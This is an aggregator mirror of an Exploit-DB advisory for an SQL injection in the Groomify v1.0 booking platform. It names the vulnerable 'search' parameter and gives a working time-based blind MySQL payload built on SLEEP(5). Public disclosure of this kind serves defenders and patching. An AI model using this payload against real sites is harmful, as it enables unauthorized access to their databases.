0
[webapps] Groomify v1.0 - SQL Injection
source link: https://www.exploit-db.com/exploits/51526
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Groomify v1.0 - SQL Injection
EDB-ID:
51526
EDB Verified:
# Exploit Title: Groomify v1.0 - SQL Injection
# Date: 2023-06-17
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor:
https://codecanyon.net/item/groomify-barbershop-salon-spa-booking-and-ecommerce-platform/45808114#
# Demo Site: https://script.bugfinder.net/groomify
# Tested on: Kali Linux
# CVE: N/A
### Vulnerable URL ###
https://localhost/groomify/blog-search?search=payload
### Parameter & Payloads ###
Parameter: search (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=deneme' AND (SELECT 1642 FROM (SELECT(SLEEP(5)))Xppf)
AND 'rszk'='rszk
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK